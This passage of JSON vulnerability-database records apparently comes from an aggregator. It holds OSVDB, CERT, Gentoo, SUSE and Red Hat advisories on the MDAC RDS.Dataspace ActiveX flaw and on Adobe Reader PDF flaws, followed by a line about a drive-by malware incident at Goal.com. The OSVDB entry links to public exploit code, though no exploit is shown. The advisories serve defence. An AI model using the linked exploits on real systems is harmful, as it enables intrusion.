Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-0003"], "edition": 1, "description": "## Vulnerability Description\nMicrosoft RDS.Dataspace ActiveX control, which is distributed with Microsoft Data Access Components, contains a flaw that may allow an attacker to execute code in the context of the user visiting a malicious web page. No further details have been provided.\n## Solution Description\nMicrosoft has released a patch to address this issue. Additionally, it is possible to correct the flaw by implementing the following workaround(s): \ndisable execution of activeX controls in Internet Explorer\n## Short Description\nMicrosoft RDS.Dataspace ActiveX control, which is distributed with Microsoft Data Access Components, contains a flaw that may allow an attacker to execute code in the context of the user visiting a malicious web page. No further details have been provided.\n## References:\n[Vendor Specific Advisory URL](http://www.hitachi-support.com/security_e/vuls_e/HS06-013_e/index-e.html)\nSecurity Tracker: 1015894\n[Secunia Advisory ID:19583](https://secuniaresearch.flexerasoftware.com/advisories/19583/)\n[Secunia Advisory ID:20719](https://secuniaresearch.flexerasoftware.com/advisories/20719/)\nMicrosoft Security Bulletin: MS06-014\nMicrosoft Knowledge Base Article: 911562\nKeyword: MDAC\nGeneric Exploit URL: http://milw0rm.com/exploits/2052\nGeneric Exploit URL: http://www.securityfocus.com/data/vulnerabilities/exploits/bl4ck_ms06_014.py\nGeneric Exploit URL: http://metasploit.com/projects/Framework/exploits.html#ie_createobject\n[CVE-2006-0003](https://vulners.com/cve/CVE-2006-0003)\nBugtraq ID: 17462\n", "modified": "2006-04-11T15:32:38", "published": "2006-04-11T15:32:38", "href": "https://vulners.com/osvdb/OSVDB:24517", "id": "OSVDB:24517", "type": "osvdb", "title": "Microsoft Data Access Components RDS.Dataspace ActiveX Remote Code Execution", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:43:06", "bulletinFamily": "info", "cvelist": ["CVE-2006-0003"], "description": "### Overview \n\nThe Microsoft RDS.Dataspace ActiveX control bypasses the ActiveX security model, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. \n\n### Description \n\n**ActiveX** \n\n\n[ActiveX](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Internet Explorer is a common Windows application that makes use of ActiveX controls. \n** \nActiveX safety determination** \n \nInternet Explorer determines if an ActiveX control is safe by querying the [IObjectSafety interface](<http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp>) of the object and by querying the Implemented Categories registry key for the control, as specified by [Microsoft Knowledge Base Article 216434](<http://support.microsoft.com/kb/216434/>) and the [MSDN ActiveX safety article](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>). \n** \nActiveX security options** \n \nThrough either the IObjectSafety interface or the appropriate registry values, an ActiveX control can be marked as \"safe for scripting\" and/or \"safe for initialization.\" According to the MSDN article [Signing and Marking ActiveX Controls](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp>):\n\n_If you mark your control as safe for initializing, you are asserting that no matter what values are used to initialize your control, it won't do anything that would damage a user's system or compromise the user's security._ \n_ \nIf you mark your control as safe for scripting, you are asserting that your control won't do anything to damage a user's system or compromise the user's security, regardless of how your control's methods and properties are manipulated by the Web page's script. In other words, it has to accept any method calls (with any parameters) and/or property manipulations in any order without doing anything bad._ \n**Microsoft Data Access Components and Remote Data Service (RDS)** \n \nMDAC is a collection of utilities and routines to process requests between databases and network applications. The RDS component provides an intermediary step for a client's request for service from a back-end database. The component enables the web site to apply business logic to the request. \n \n**The Problem** \n \nThe RDS.Dataspace ActiveX control includes a method that can create an instance of an ActiveX control that exists on the system. The ActiveX objects created in this manner will bypass the ActiveX security model. In particular, the \"safe for scripting\" and killbit options are ignored. Note that in default configurations of Internet Explorer, the RDS.Dataspace ActiveX control cannot be loaded in the Internet Zone. \n \nNote that exploit code for this vulnerability is publicly available. \n \nMore information is available in Microsoft Security Bulletin [MS06-014](<http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>). \n \n--- \n \n### Impact \n\nIf a remote attacker can persuade a user to access a specially crafted web page, that attacker may be able to execute arbitrary code with the privileges of the compromised user. \n \n--- \n \n### Solution \n\n**Apply an Update** \nThis issue is addressed in Microsoft Security Bulletin [MS06-014](<http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>). \n \n--- \n \n \n**Disable the**** ****RDS.Dataspace ActiveX control**** ****in Internet Explorer** \n \nThe RDS.Dataspace ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n{BD96C556-65A3-11D0-983A-00C04FC29E36} \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). \n** \nDisable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser\"](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) document[](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) and the [Malicious Web Scripts FAQ](<http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>). \n \n--- \n \n### Vendor Information\n\n234812\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: April 11, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234812 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx>\n * <http://secunia.com/advisories/19583/>\n * <http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp>\n\n### Acknowledgements\n\nThis vulnerability was reported in Microsoft Security Bulletin MS06-014. Microsoft credits Golan Yosef of Finjan's Malicious Code Research Center (MCRC) with providing information regarding this vulnerability.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-0003](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0003>) \n---|--- \n**Date Public:** | 2006-04-11 \n**Date First Published:** | 2006-04-11 \n**Date Last Updated: ** | 2006-11-02 13:58 UTC \n**Document Revision: ** | 19 \n", "modified": "2006-11-02T13:58:00", "published": "2006-04-11T00:00:00", "id": "VU:234812", "href": "https://www.kb.cert.org/vuls/id/234812", "type": "cert", "title": "RDS.Dataspace ActiveX control bypasses ActiveX security model", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:16", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "### Background\n\nAdobe Reader (formerly Adobe Acrobat Reader) is a closed-source PDF reader. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Reader: \n\n * Alin Rad Pop of Secunia Research reported a heap-based buffer overflow when processing PDF files containing a malformed JBIG2 symbol dictionary segment (CVE-2009-0193). \n * A buffer overflow related to a non-JavaScript function call and possibly an embedded JBIG2 image stream has been reported (CVE-2009-0658). \n * Tenable Network Security reported a stack-based buffer overflow that can be triggered via a crafted argument to the getIcon() method of a Collab object (CVE-2009-0927). \n * Sean Larsson of iDefense Labs reported a heap-based buffer overflow when processing a PDF file containing a JBIG2 stream with a size inconsistency related to an unspecified table (CVE-2009-0928). \n * Jonathan Brossard of the iViZ Security Research Team reported an unspecified vulnerability related to JBIG2 and input validation (CVE-2009-1061). \n * Will Dormann of CERT/CC reported a vulnerability lading to memory corruption related to JBIG2 (CVE-2009-1062). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted PDF document, possibly leading to the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-8.1.4\"", "edition": 1, "modified": "2009-04-18T00:00:00", "published": "2009-04-18T00:00:00", "id": "GLSA-200904-17", "href": "https://security.gentoo.org/glsa/200904-17", "type": "gentoo", "title": "Adobe Reader: User-assisted execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:50:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the Adobe Reader allowed attackers to crash acroread or even execute arbitrary code by tricking users into opening specially crafted PDF files. Please find more details at Adobe's site: http://www.adobe.com/support/security/bulletins/apsb09-04.html Note that Adobe did not provide updates for Adobe Reader 7 as used on NLD9. We cannot upgrade to newer versions due to library dependencies. We strongly encourage users of acroread on NLD9 to uninstall the package and to use an alternative, open source pdf viewer instead. We're currently evaluating the possibility of disabling acroread on NLD9 via online update.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-03-27T15:24:52", "published": "2009-03-27T15:24:52", "id": "SUSE-SA:2009:014", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-03/msg00005.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-12-11T13:32:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2549", "CVE-2008-2992", "CVE-2008-4812", "CVE-2008-4813", "CVE-2008-4814", "CVE-2008-4815", "CVE-2008-4817", "CVE-2009-0927"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nSeveral input validation flaws were discovered in Adobe Reader. A malicious\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader. (CVE-2008-2549,\nCVE-2008-2992, CVE-2008-4812, CVE-2008-4813, CVE-2008-4814, CVE-2008-4817)\n\nThe Adobe Reader binary had an insecure relative RPATH (runtime library\nsearch path) set in the ELF (Executable and Linking Format) header. A local\nattacker able to convince another user to run Adobe Reader in an\nattacker-controlled directory could run arbitrary code with the privileges\nof the victim. (CVE-2008-4815)\n\nAll acroread users are advised to upgrade to these updated packages, that\ncontain Adobe Reader version 8.1.3, and are not vulnerable to these issues.", "modified": "2018-05-26T04:26:18", "published": "2008-11-12T05:00:00", "id": "RHSA-2008:0974", "href": "https://access.redhat.com/errata/RHSA-2008:0974", "type": "redhat", "title": "(RHSA-2008:0974) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
Goal.com, a popular football (aka “soccer” for all us Yanks) news site was hacked and found serving malware via drive-by-downloads between April 27 and 28, according to a post by Web security firm Armorize.